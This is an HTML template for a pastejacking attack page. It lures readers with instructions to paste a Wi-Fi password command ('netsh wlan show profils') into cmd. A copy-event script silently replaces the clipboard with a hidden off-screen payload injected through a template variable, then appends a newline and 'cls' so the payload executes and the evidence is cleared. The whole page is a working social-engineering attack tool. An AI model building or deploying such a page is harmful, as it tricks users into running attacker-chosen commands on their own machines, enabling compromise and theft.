

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Highlighted Content Page</title>

    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: black;
            color: white;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
        }

        .content-container {
            background-color: #2c2c2c;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }

        #visibleContent {
            position: absolute;
            left: -2000px;
            top: -100px;
        }

        p {
            margin-top: 20px;
            text-align: center;
        }

        .command-text {
            font-size: 18px;
            font-weight: bold;
            padding: 10px;
            margin-top: 10px;
            white-space: pre-line;
        }

        .highlight {
            background-color: #477385; /* خلفية مختلفة للأوامر المحددة */
            color: #ffffff; /* لون محدد يظهر أنه أمر قابل للتنفيذ */
            border-radius: 4px;
            padding: 2px;
            display: inline;
        }
    </style>
</head>
<body>
    <div class="content-container">
        <p id="visibleContent">
            <!-- PasteJacking code -->
            {{ payload | safe }}
        </p>
        <p class="command-text">
            Today we will talk about how to view the Wi-Fi passwords stored on your device and how to display them
            It's very simple. All you have to do is open cmd, copy and paste this text, 
            <span class="highlight">netsh wlan show profils</span>
            and all your stored passwords will simply appear.
    </div>

    <script>
        document.addEventListener('copy', function(e){
            const visibleContent = document.getElementById('visibleContent');
            const clipboardData = e.clipboardData || window.clipboardData;
            const textToCopy = visibleContent.innerText; 

            clipboardData.setData('text/plain', textToCopy+'\r\n'+'cls'+'\r\n');
            e.preventDefault();
        });
    </script>

    <!-- <p>This is the visible content that the user sees.</p> -->
</body>
</html>
